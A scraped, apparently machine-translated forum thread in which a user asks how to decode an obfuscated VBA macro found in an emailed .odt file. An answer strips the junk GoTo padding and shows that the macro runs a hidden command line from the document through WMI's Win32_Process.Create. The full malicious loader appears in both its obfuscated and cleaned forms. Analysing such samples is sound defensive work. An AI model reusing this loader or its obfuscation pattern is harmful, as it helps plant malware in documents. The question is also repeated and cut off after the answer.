如何从odt解密奇怪的宏?
How to decrypt strange macros from odt?
大家好,我在通过电子邮件发送的 odt 文件中找到了这个宏(以及其他两个类似的宏)。我知道这很危险,所以我在 linux 发行版的带有 libre office 的虚拟机中打开了它。
Option VBASupport 1
Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
GoTo GKsgQaAGE
Dim NmmcJMB As String 'POyDeJ
Open "dVMtDJ.ecCLuZ.vNWxUB" For Binary As 154
Open "GmQlB.gLlkBCq.ohnmP" For Binary As 154
Open "asHdBA.RNUGfJo.UEIiMmoM" For Binary As 154
Put #154, , NmmcJMB
Close #154
GKsgQaAGE:
GoTo fIjVkJj
Dim jFUMUmIIJ As String 'NskblDD
Open "fRHrGnFp.uWltAIHCI.WYWvIWr" For Binary As 146
Open "qQeaRICAm.KgqZFRWRC.cuPrnUFxk" For Binary As 146
Open "ShUECDIR.otrtDOGBA.OugaBFHlJ" For Binary As 146
Put #146, , jFUMUmIIJ
Close #146
fIjVkJj:
GoTo hTTQEJEAC
Dim OybSq As String 'kEafA
Open "umMOXxmA.SfYuGDN.ueONFAEFD" For Binary As 227
Open "eIQhLAGS.forvJhMB.LGyFI" For Binary As 227
Open "TifoEDtFB.fukVJAvIS.dlciFGDA" For Binary As 227
Put #227, , OybSq
Close #227
hTTQEJEAC:
HBYVV = ""
S619csvpd1v4xzk5kc = HBYVV + VBA.Replace _
(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
GoTo mJsZBCEFo
Dim jUDsXM As String 'gtpnJOwLd
Open "myDIGCFHC.cgXWyuEFC.OybuGU" For Binary As 131
Open "EnJMG.KCVSIHB.BJiWBGLWG" For Binary As 131
Open "kfSFYoEHi.aXUIAvAP.dswKhikA" For Binary As 131
Put #131, , jUDsXM
Close #131
mJsZBCEFo:
GoTo BOzmWI
Dim CJeaFB As String 'jtrvFEWLD
Open "dfOYHJLF.uBXVkGE.ghpJGB" For Binary As 124
Open "MTfEVUDIQ.DlrvrPEB.PgggwwMD" For Binary As 124
Open "YHUtVQCI.AyvDaAH.JsZULCUu" For Binary As 124
Put #124, , CJeaFB
Close #124
BOzmWI:
GoTo kPMjtUB
Dim eVbTfoFi As String 'xTUBS
Open "eXoWdB.HSupDA.oXRxAS" For Binary As 149
Open "nmuAl.yeRQHDs.UqyoFI" For Binary As 149
Open "nzFmWEVE.ZFvEGsIFD.mjIMGVD" For Binary As 149
Put #149, , eVbTfoFi
Close #149
kPMjtUB:
End Function
Function Tujor4m47ob()
On Error Resume Next
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
GoTo aektCnFI
Dim jaJUkAFeG As String 'cwxgFSS
Open "DbnKMvMAH.jHcdBADv.EGxUCAADs" For Binary As 201
Open "gQEGCB.HVmcrDI.zGpVIUABC" For Binary As 201
Open "shyujG.RFwdH.VPRoIX" For Binary As 201
Put #201, , jaJUkAFeG
Close #201
aektCnFI:
GoTo RtfzGtt
Dim WWCACxG As String 'mRJNaEGtF
Open "vATeCIgJI.FpiaIJIiJ.MmplJ" For Binary As 153
Open "MOIhAmCn.UAJXCE.BwsiJS" For Binary As 153
Open "NpVFCB.MCDxG.UpDmKPxpp" For Binary As 153
Put #153, , WWCACxG
Close #153
RtfzGtt:
GoTo QSISC
Dim qVbhwsATQ As String 'HGHRiZB
Open "xaihM.LJwjAQQQZ.DJoqHIrg" For Binary As 188
Open "HvKRFHh.hsVhH.bZBNF" For Binary As 188
Open "XqxxqFG.ulGKCnC.YQRUOJ" For Binary As 188
Put #188, , qVbhwsATQ
Close #188
QSISC:
sng2 = "qq)(" + "s2)(pq" + _
"q)(s2)("
F7_if4svnte = "qq)(s" + _
"2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + _
"(sqq)(s2)(sqq)(s2)(qq)(s2)("
GoTo nelsfX
Dim MURoCFiFB As String 'XLWzECHi
Open "JvOnPcH.fUHBCGVtD.MqiHAD" For Binary As 133
Open "buFGCCXJ.QSbaYn.wJSsDBFER" For Binary As 133
Open "PBmiWVMA.fEuTBGH.ZgHREKHJC" For Binary As 133
Put #133, , MURoCFiFB
Close #133
nelsfX:
GoTo huGtwmS
Dim taucEJAED As String 'KDSQqD
Open "QlyBbpIG.CHPUEZ.BAQVDHmJ" For Binary As 59
Open "CaxOH.vXPgFHoe.agirIF" For Binary As 59
Open "yzpwxsD.ucWxvGt.QXFsbDn" For Binary As 59
Put #59, , taucEJAED
Close #59
huGtwmS:
GoTo DvDefEl
Dim TfsIR As String 'hnOfJN
Open "exIqDH.MwmVE.YEfbFIJ" For Binary As 176
Open "wMlGriIC.YqLZwG.IfqJAT" For Binary As 176
Open "qSgyRp.VhQHDEA.ggPyFQd" For Binary As 176
Put #176, , TfsIR
Close #176
DvDefEl:
Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + _
"2)(inqq)(s2)(3qq)(s" + _
"2)(2qq)(s2)(_qq)(s2)("
GoTo vAZQiJB
Dim xuHzWGDG As String 'RmbpI
Open "ZRfmBGEw.yZYjFMHP.ckDWe" For Binary As 141
Open "gbBrhF.kCOlJnAJ.GLIdD" For Binary As 141
Open "MBUUAw.NbPECAix.UyuHH" For Binary As 141
Put #141, , xuHzWGDG
Close #141
vAZQiJB:
GoTo nmWOSYyF
Dim QPqDJP As String 'HLdYiFJHC
Open "LwmxHCmp.NFrlTBA.VFGtT" For Binary As 149
Open "ofEFEBH.KSyFFWK.TKfABI" For Binary As 149
Open "gyhfb.ipvwBrE.vVquOxU" For Binary As 149
Put #149, , QPqDJP
Close #149
nmWOSYyF:
GoTo tWXiIJDnz
Dim PJjuJ As String 'gmzmA
Open "RkYwxnJEW.rgdTkJfGF.zantCJ" For Binary As 152
Open "yxpQHDBA.zkorIAiHS.StjAKJ" For Binary As 152
Open "nbYwYEWhC.CeOFDlC.VvhoEHt" For Binary As 152
Put #152, , PJjuJ
Close #152
tWXiIJDnz:
R67uawfvzvw = "wqq)(s2" + _
")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
GoTo SyZjrEHAG
Dim UjcXr As String 'MpbLCImG
Open "WanlBnGn.vOkxHB.FUNtGuCCw" For Binary As 52
Open "krLiFHpF.eVBFvd.JWHZCso" For Binary As 52
Open "umSoGWOGJ.uhkWJDAQ.ACsLFB" For Binary As 52
Put #52, , UjcXr
Close #52
SyZjrEHAG:
GoTo uXAHJydE
Dim HpQEA As String 'THrtIBIAD
Open "rRdnUjHbw.iDplGAz.PjQxp" For Binary As 211
Open "TXrkTGK.FbNkBCE.nGfkHCJj" For Binary As 211
Open "fnehJF.MwLyDGIC.meixAlF" For Binary As 211
Put #211, , HpQEA
Close #211
uXAHJydE:
GoTo PYuemWAC
Dim DiIIF As String 'OPurH
Open "nXywAI.gJpfbBO.HipQCDYJJ" For Binary As 129
Open "SZqPCAC.pZyeTtAF.ORiEHGH" For Binary As 129
Open "OrYPhm.tEuCH.YaWnFsI" For Binary As 129
Put #129, , DiIIF
Close #129
PYuemWAC:
Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
GoTo UxlgEAI
Dim rFHJy As String 'zHXJG
Open "CRkMC.mCwoR.dFnkA" For Binary As 185
Open "jrtAEKE.uIVzu.jqMwAC" For Binary As 185
Open "HJmgHkBC.MyfFGEi.rTJlw" For Binary As 185
Put #185, , rFHJy
Close #185
UxlgEAI:
GoTo vIDVA
Dim GWbqA As String 'UxHBcFQ
Open "YeMqlJ.uCiqCNS.WjgigV" For Binary As 159
Open "DrttFCz.lpfOt.UeCjC" For Binary As 159
Open "AscqIIYrJ.JeGiiSE.mYjmAABJ" For Binary As 159
Put #159, , GWbqA
Close #159
vIDVA:
GoTo lutoTsPkH
Dim nmwGcQ As String 'OTTxPImEN
Open "iVnKJ.YEevQ.GWucCAFI" For Binary As 217
Open "NxgIP.TARFAADew.NyFRA" For Binary As 217
Open "NvrZDA.DdShRHFtD.BErohw" For Binary As 217
Put #217, , nmwGcQ
Close #217
lutoTsPkH:
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
GoTo QdQmIDzTC
Dim akWgAQAIC As String 'rMAWIEja
Open "lHZGGIbGc.iaJoCAFB.VNeICCIax" For Binary As 206
Open "RdpGJIBOF.swjFv.IeAbvID" For Binary As 206
Open "IyaYxC.BTSLmDJ.jgOiOIDGT" For Binary As 206
Put #206, , akWgAQAIC
Close #206
QdQmIDzTC:
GoTo zNPNECkYX
Dim JZcLuFA As String 'VtNiGGmD
Open "FOxJQVBLi.dDrmJG.osuuaBIDb" For Binary As 125
Open "gWUYvHr.ZTgQT.DNujcI" For Binary As 125
Open "BwDJADFsC.LJFNLbb.daiRJD" For Binary As 125
Put #125, , JZcLuFA
Close #125
zNPNECkYX:
GoTo vmJnC
Dim OahWDBD As String 'zMMkH
Open "xINyH.PTxmCYVEI.ZjICHD" For Binary As 167
Open "ywqUjrAcG.nStXYBIsJ.CUmPFEHE" For Binary As 167
Open "gThcAJ.ZKJdpcm.tjPbu" For Binary As 167
Put #167, , OahWDBD
Close #167
vmJnC:
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
GoTo sFyhnDDx
Dim PCRIYp As String 'pMvRFAK
Open "sNdvIH.EwGNvsEC.ALrzVIC" For Binary As 203
Open "sClXGS.DwVOXN.VhyWJEJ" For Binary As 203
Open "UtEKe.Ylfjhi.utxEPXwo" For Binary As 203
Put #203, , PCRIYp
Close #203
sFyhnDDx:
GoTo RKPFYlFb
Dim pRdXtubFT As String 'gfQxcwC
Open "QsQGaIC.AwxeAW.xtrtFCFdF" For Binary As 158
Open "TxVEJ.iXjAEimg.TDSdLDOA" For Binary As 158
Open "ThIgAFZBB.NbVEqpw.YsHvp" For Binary As 158
Put #158, , pRdXtubFT
Close #158
RKPFYlFb:
GoTo vmlpJOA
Dim HUPVnvFAA As String 'WkgKBIH
Open "rxhFoG.AShLFJDl.zybsiV" For Binary As 191
Open "UDZsNIDG.VfdgH.MBiBLq" For Binary As 191
Open "MAIbDAaJ.BfRJzI.vKbPTLCD" For Binary As 191
Put #191, , HUPVnvFAA
Close #191
vmlpJOA:
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
GoTo PViTAAED
Dim KMChE As String 'tdXnByPb
Open "IJzlC.SoCtG.TPbXhBKrm" For Binary As 94
Open "GAzJGdUeC.SjRAxF.SebwGKPCv" For Binary As 94
Open "BCyTAdFeI.MvwOCAI.YKhJFAApg" For Binary As 94
Put #94, , KMChE
Close #94
PViTAAED:
GoTo RBFRbHBg
Dim DqWYFGG As String 'UDjSMF
Open "AQlXBCb.vtUJfcFG.uXigEO" For Binary As 214
Open "ZDHjAEWl.doArj.lPBxKCC" For Binary As 214
Open "aGQoDDk.VZsZQhDoP.fnRuG" For Binary As 214
Put #214, , DqWYFGG
Close #214
RBFRbHBg:
GoTo SFgGtIlpD
Dim GDZZqGDJ As String 'FpwxECGKS
Open "gMgqJJ.sEwvhb.SuXWmVIA" For Binary As 106
Open "nrzOZDa.ZzIiFFSE.VjWVF" For Binary As 106
Open "vPEJJqH.jFzYA.AlzwaDJBw" For Binary As 106
Put #106, , GDZZqGDJ
Close #106
SFgGtIlpD:
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
GoTo xjadBeU
Dim nmTHypHA As String 'DVUNjGqL
Open "cURDDF.pLPgGlcD.FYnPCELJI" For Binary As 127
Open "HvCbXDBq.RUZaGEzC.bgBsAAd" For Binary As 127
Open "vBsfDkB.xlZBIMF.TDVEEFQJ" For Binary As 127
Put #127, , nmTHypHA
Close #127
xjadBeU:
GoTo wWUQDA
Dim AEazvYO As String 'WmUZOHEM
Open "DMNSECHJb.bbxJxAEDq.LnJxA" For Binary As 55
Open "gFPXD.IEgaqJz.YAHsC" For Binary As 55
Open "lEilB.QvPXD.cMfWCJO" For Binary As 55
Put #55, , AEazvYO
Close #55
wWUQDA:
GoTo xFoIFC
Dim YFLpuEi As String 'WteBl
Open "nfhAABBEB.VeDeFP.sKzKuBBC" For Binary As 203
Open "wXXiJHf.TCBShGYr.DNKsHT" For Binary As 203
Open "mQnnE.bmZQGSEA.AGkxGzCHX" For Binary As 203
Put #203, , YFLpuEi
Close #203
xFoIFC:
GoTo QGPRjInP
Dim WKiiJDVJq As String 'yoOwJD
Open "qyXGFD.Mnoog.UnkFG" For Binary As 109
Open "HKwtB.rBrtHJf.lLgDD" For Binary As 109
Open "AhHYjIBs.vNObEAAJ.IRARxrx" For Binary As 109
Put #109, , WKiiJDVJq
Close #109
QGPRjInP:
GoTo AsvyFHHC
Dim FymJHI As String 'DYLTWEF
Open "sLYJBI.TQZluJA.LgcFP" For Binary As 175
Open "ojxyHHEP.vXfQD.OBTMB" For Binary As 175
Open "AlRZo.MXGVMDVDJ.FRGRQ" For Binary As 175
Put #175, , FymJHI
Close #175
AsvyFHHC:
GoTo iKyOGBLAy
Dim zqgnJAxpy As String 'HZaLGI
Open "aKrxWJUr.NfKHtA.lWiIG" For Binary As 150
Open "byAGVzBQ.OjVafcB.yoXPx" For Binary As 150
Open "fSJtFAEEA.yqTyACLA.PWwsTDwIy" For Binary As 150
Put #150, , zqgnJAxpy
Close #150
iKyOGBLAy:
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
GoTo pUmEYEJA
Dim eRlMmLKx As String 'rpaKAI
Open "YeeTCIHp.dBrFLg.qZpkDJ" For Binary As 209
Open "ghtMtA.YUxUI.QTlVpGJg" For Binary As 209
Open "jevGKBz.ZpfmEFvDM.fkIcAGBII" For Binary As 209
Put #209, , eRlMmLKx
Close #209
pUmEYEJA:
GoTo CUZigB
Dim rJseFDK As String 'fQYhA
Open "qDBKOE.hcDCJ.BVRxGIBBJ" For Binary As 207
Open "ENMCE.LcqmMLm.kcwYHCV" For Binary As 207
Open "UaWqrCaA.UYSnZCG.urBVH" For Binary As 207
Put #207, , rJseFDK
Close #207
CUZigB:
GoTo XonQB
Dim TOMwIrgJ As String 'pIUaGf
Open "ohhFBJjA.uWdjpFFGk.FVdrHAB" For Binary As 189
Open "OEqrJ.wqhoDAHQ.xAflFS" For Binary As 189
Open "YWibCdgEJ.NDhrE.WdBFBFE" For Binary As 189
Put #189, , TOMwIrgJ
Close #189
XonQB:
GoTo rKyfgFyfq
Dim cztpFp As String 'YwYKGv
Open "ajyVJ.ohKLAGtFI.fshBTGEF" For Binary As 138
Open "imfriCGFb.tYNKga.WYPiZwEHH" For Binary As 138
Open "KuhBGApcv.ojBZUIIEX.HJefxELF" For Binary As 138
Put #138, , cztpFp
Close #138
rKyfgFyfq:
GoTo kvkwNE
Dim ugNdBHTqJ As String 'HtmXmvT
Open "aRotQ.FHGaEABuI.JNHZBdF" For Binary As 202
Open "uMBDk.VxvrDae.NYTTAIAe" For Binary As 202
Open "VWYJvN.lGHiEC.AlsbD" For Binary As 202
Put #202, , ugNdBHTqJ
Close #202
kvkwNE:
GoTo UaqRCIH
Dim bgosIAI As String 'hAsNYHIgo
Open "rFDaOyDH.hZniGGDBp.fHUVY" For Binary As 134
Open "KrSuJCFF.aeIBC.hRLXIc" For Binary As 134
Open "PuNKnKt.sBhbCCuE.ikMJIZFm" For Binary As 134
Put #134, , bgosIAI
Close #134
UaqRCIH:
End Function
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
On Error Resume Next
GoTo oheeCHI
Dim iVJGnsW As String 'OEDeu
Open "GjkaJIH.peZmtHtGM.gypgP" For Binary As 140
Open "YBkxHBECF.YlsyXD.WgzGtH" For Binary As 140
Open "FbjEBIGb.HVqybIN.uhHkRpG" For Binary As 140
Put #140, , iVJGnsW
Close #140
oheeCHI:
GoTo yPqfxADJ
Dim qTLRXCv As String 'wvoHE
Open "fYqreeAI.UbBaCOpIW.ibhMgA" For Binary As 207
Open "yycyIZBxI.LLMLGP.MSuNHDBEY" For Binary As 207
Open "NxkCf.PoyHSN.naAFIEIY" For Binary As 207
Put #207, , qTLRXCv
Close #207
yPqfxADJ:
GoTo bRMAl
Dim qpTUMG As String 'FVzXiA
Open "klmCEx.LHwvHEV.nvbNG" For Binary As 210
Open "xlsUIHJ.HlAbuCnVB.fhPbXCDLR" For Binary As 210
Open "bpgkEyAEz.XZZWFRiW.DWsAgQ" For Binary As 210
Put #210, , qpTUMG
Close #210
bRMAl:
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
GoTo TrdMzBDZJ
Dim uhqsGuAB As String 'LyQczqYvJ
Open "XcQyeAFEH.OxwUTAF.OjTNwA" For Binary As 178
Open "QEkjG.mlBEHrAJ.IdkPDI" For Binary As 178
Open "INzOLEyBR.lEZxQ.rjitI" For Binary As 178
Put #178, , uhqsGuAB
Close #178
TrdMzBDZJ:
GoTo loQNDFH
Dim RBLslko As String 'BQaqZjA
Open "uxKEC.pIZoJF.srBaREc" For Binary As 135
Open "BOoAgEz.NoSsFEBBB.RueFu" For Binary As 135
Open "tPaIGWt.sNypwJ.uiODJJJA" For Binary As 135
Put #135, , RBLslko
Close #135
loQNDFH:
GoTo RjWVCNKEI
Dim XUDHDiKId As String 'DfsDD
Open "YJiQHG.tumcISEI.XTUZB" For Binary As 141
Open "QQMFr.jWYtE.SdCsJ" For Binary As 141
Open "PVgOlGBl.pUbOHFCY.MgaMJSI" For Binary As 141
Put #141, , XUDHDiKId
Close #141
RjWVCNKEI:
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
GoTo nMdUMleFB
Dim SLJdkBII As String 'FWRUNdgHJ
Open "FVMJB.OanJEHHDG.BFKlGjECA" For Binary As 163
Open "cDYsKH.cikTAY.Ezyuc" For Binary As 163
Open "uIxkJo.MWxKvDHC.vvgQEXJDH" For Binary As 163
Put #163, , SLJdkBII
Close #163
nMdUMleFB:
GoTo mdgvjEeAC
Dim LbhGD As String 'XKxXUoJG
Open "jbKPlXCDh.siqMFp.byKaIAlXB" For Binary As 192
Open "ooZqmESHe.BQQQEBd.iaBAnAZ" For Binary As 192
Open "SgKEFsHED.atIRE.nAXgHCyr" For Binary As 192
Put #192, , LbhGD
Close #192
mdgvjEeAC:
GoTo ojGsFHEEF
Dim IkDkKCv As String 'KClXGffED
Open "stscCEAUT.PziCFDmD.xEGKXRGTE" For Binary As 106
Open "fzpZGsD.rsWZI.nhqNVH" For Binary As 106
Open "MxRtxH.yGeKFDG.nRzlA" For Binary As 106
Put #106, , IkDkKCv
Close #106
ojGsFHEEF:
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
GoTo aeMpCH
Dim ClyWRG As String 'mYWbL
Open "eAdUlJHj.rMYTRAF.IMwLCCCT" For Binary As 170
Open "gaJjDP.jqoPjEzCA.sqvbMGBp" For Binary As 170
Open "kwgqDdCZ.UJhzPcBmS.DIZSAkBG" For Binary As 170
Put #170, , ClyWRG
Close #170
aeMpCH:
GoTo BHZQG
Dim HvnISHlCE As String 'ffPuICmH
Open "DySslFhhA.wiGJV.ChxbEmyAk" For Binary As 205
Open "NMdOHH.BANiFHPHQ.VGJSDA" For Binary As 205
Open "KtidJsSE.paErC.KUloBYBF" For Binary As 205
Put #205, , HvnISHlCE
Close #205
BHZQG:
GoTo vApdD
Dim vuEJPy As String 'OnFFAqHWH
Open "VmdtNNT.mylsHGACs.cOGFA" For Binary As 167
Open "vPtDJGH.uqPgaLD.WNoez" For Binary As 167
Open "dOeICmG.rNLBfGjIw.auFLHQY" For Binary As 167
Put #167, , vuEJPy
Close #167
vApdD:
End Function
我如何才能看到它的实际作用?这明明是加密的,但必须有办法解密,否则怎么能在任何机器上执行?
如果您注意,您会发现几乎每个 GoTo
都指向另一个 GoTo
而不是实际代码。您看到的大部分代码甚至都不会执行。如果这样做,它将失败并出现错误,因为它试图打开同一文件号下不存在的文件,这是不允许的。
您可以通过 GoTo
链轻松找到确实执行的行,只有一打。
识别出它们并删除仅存在以混淆反恶意软件的死代码后,您将得到三个相当短的函数:
Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
HBYVV = ""
S619csvpd1v4xzk5kc = HBYVV + VBA.Replace _
(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
End Function
Function Tujor4m47ob()
On Error Resume Next
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
sng2 = "qq)(" + "s2)(pq" + _
"q)(s2)("
F7_if4svnte = "qq)(s" + _
"2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + _
"(sqq)(s2)(sqq)(s2)(qq)(s2)("
Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + _
"2)(inqq)(s2)(3qq)(s" + _
"2)(2qq)(s2)(_qq)(s2)("
R67uawfvzvw = "wqq)(s2" + _
")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
End Function
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
On Error Resume Next
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
End Function
如果您随后将字符串文字折叠成一个并删除已知始终为空的虚假变量,您将得到:
Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
S619csvpd1v4xzk5kc = VBA.Replace(Xoyqcbzwjyi6tqiw0z, "qq)(s2)(", "")
End Function
Function Tujor4m47ob()
On Error Resume Next
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
sng2 = "qq)(s2)(pqq)(s2)("
F7_if4svnte = "qq)(s2)(roqq)(s2)(qq)(s2)(ceqq)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)("
Vbzhqcqh1pqco1e2_ = "qq)(s2)(:wqq)(s2)(qq)(s2)(inqq)(s2)(3qq)(s2)(2qq)(s2)(_qq)(s2)("
R67uawfvzvw = "wqq)(s2)(inqq)(s2)(mqq)(s2)(gmqq)(s2)(tqq)(s2)(qq)(s2)("
Kz1yuitvz3qu6xai = ChrW(wdKeyS)
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
End Function
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
On Error Resume Next
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
End Function
现在您或许可以为这些函数指定适当的名称,并将混淆后的字符串替换为对它们进行去混淆后的结果:
Function RemoveBogusQqFromString(input_string)
RemoveBogusQqFromString = VBA.Replace(input_string, "qq)(s2)(", "")
End Function
Function WrapperForRemoveBogusQqFromString(input_string)
On Error Resume Next
WrapperForRemoveBogusQqFromString = RemoveBogusQqFromString(input_string)
End Function
Function StartProcess()
On Error Resume Next
ObfuscatedCommandLineWithPrefix = T6dwlv_ivpoiq2.StoryRanges.Item(1)
Set ProcessObjectInstance = CreateObject("winmgmts:win32_process")
ObfuscatedCommandLine = Mid(ObfuscatedCommandLineWithPrefix, 5)
ProcessObjectInstance.Create WrapperForRemoveBogusQqFromString(ObfuscatedCommandLine), "", ""
End Function
这需要一个存储在名为 T6dwlv_ivpoiq2
的 Word 对象中的模糊命令行(我假设 ThisDocument
已重命名为那个)并通过 Win32_Process::Create
.[=20= 运行它]
大家好,我在通过电子邮件发送的 odt 文件中找到了这个宏(以及其他两个类似的宏)。我知道这很危险,所以我在 linux 发行版的带有 libre office 的虚拟机中打开了它。
Option VBASupport 1
Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
GoTo GKsgQaAGE
Dim NmmcJMB As String 'POyDeJ
Open "dVMtDJ.ecCLuZ.vNWxUB" For Binary As 154
Open "GmQlB.gLlkBCq.ohnmP" For Binary As 154
Open "asHdBA.RNUGfJo.UEIiMmoM" For Binary As 154
Put #154, , NmmcJMB
Close #154
GKsgQaAGE:
GoTo fIjVkJj
Dim jFUMUmIIJ As String 'NskblDD
Open "fRHrGnFp.uWltAIHCI.WYWvIWr" For Binary As 146
Open "qQeaRICAm.KgqZFRWRC.cuPrnUFxk" For Binary As 146
Open "ShUECDIR.otrtDOGBA.OugaBFHlJ" For Binary As 146
Put #146, , jFUMUmIIJ
Close #146
fIjVkJj:
GoTo hTTQEJEAC
Dim OybSq As String 'kEafA
Open "umMOXxmA.SfYuGDN.ueONFAEFD" For Binary As 227
Open "eIQhLAGS.forvJhMB.LGyFI" For Binary As 227
Open "TifoEDtFB.fukVJAvIS.dlciFGDA" For Binary As 227
Put #227, , OybSq
Close #227
hTTQEJEAC:
HBYVV = ""
S619csvpd1v4xzk5kc = HBYVV + VBA.Replace _
(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
GoTo mJsZBCEFo
Dim jUDsXM As String 'gtpnJOwLd
Open "myDIGCFHC.cgXWyuEFC.OybuGU" For Binary As 131
Open "EnJMG.KCVSIHB.BJiWBGLWG" For Binary As 131
Open "kfSFYoEHi.aXUIAvAP.dswKhikA" For Binary As 131
Put #131, , jUDsXM
Close #131
mJsZBCEFo:
GoTo BOzmWI
Dim CJeaFB As String 'jtrvFEWLD
Open "dfOYHJLF.uBXVkGE.ghpJGB" For Binary As 124
Open "MTfEVUDIQ.DlrvrPEB.PgggwwMD" For Binary As 124
Open "YHUtVQCI.AyvDaAH.JsZULCUu" For Binary As 124
Put #124, , CJeaFB
Close #124
BOzmWI:
GoTo kPMjtUB
Dim eVbTfoFi As String 'xTUBS
Open "eXoWdB.HSupDA.oXRxAS" For Binary As 149
Open "nmuAl.yeRQHDs.UqyoFI" For Binary As 149
Open "nzFmWEVE.ZFvEGsIFD.mjIMGVD" For Binary As 149
Put #149, , eVbTfoFi
Close #149
kPMjtUB:
End Function
Function Tujor4m47ob()
On Error Resume Next
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
GoTo aektCnFI
Dim jaJUkAFeG As String 'cwxgFSS
Open "DbnKMvMAH.jHcdBADv.EGxUCAADs" For Binary As 201
Open "gQEGCB.HVmcrDI.zGpVIUABC" For Binary As 201
Open "shyujG.RFwdH.VPRoIX" For Binary As 201
Put #201, , jaJUkAFeG
Close #201
aektCnFI:
GoTo RtfzGtt
Dim WWCACxG As String 'mRJNaEGtF
Open "vATeCIgJI.FpiaIJIiJ.MmplJ" For Binary As 153
Open "MOIhAmCn.UAJXCE.BwsiJS" For Binary As 153
Open "NpVFCB.MCDxG.UpDmKPxpp" For Binary As 153
Put #153, , WWCACxG
Close #153
RtfzGtt:
GoTo QSISC
Dim qVbhwsATQ As String 'HGHRiZB
Open "xaihM.LJwjAQQQZ.DJoqHIrg" For Binary As 188
Open "HvKRFHh.hsVhH.bZBNF" For Binary As 188
Open "XqxxqFG.ulGKCnC.YQRUOJ" For Binary As 188
Put #188, , qVbhwsATQ
Close #188
QSISC:
sng2 = "qq)(" + "s2)(pq" + _
"q)(s2)("
F7_if4svnte = "qq)(s" + _
"2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + _
"(sqq)(s2)(sqq)(s2)(qq)(s2)("
GoTo nelsfX
Dim MURoCFiFB As String 'XLWzECHi
Open "JvOnPcH.fUHBCGVtD.MqiHAD" For Binary As 133
Open "buFGCCXJ.QSbaYn.wJSsDBFER" For Binary As 133
Open "PBmiWVMA.fEuTBGH.ZgHREKHJC" For Binary As 133
Put #133, , MURoCFiFB
Close #133
nelsfX:
GoTo huGtwmS
Dim taucEJAED As String 'KDSQqD
Open "QlyBbpIG.CHPUEZ.BAQVDHmJ" For Binary As 59
Open "CaxOH.vXPgFHoe.agirIF" For Binary As 59
Open "yzpwxsD.ucWxvGt.QXFsbDn" For Binary As 59
Put #59, , taucEJAED
Close #59
huGtwmS:
GoTo DvDefEl
Dim TfsIR As String 'hnOfJN
Open "exIqDH.MwmVE.YEfbFIJ" For Binary As 176
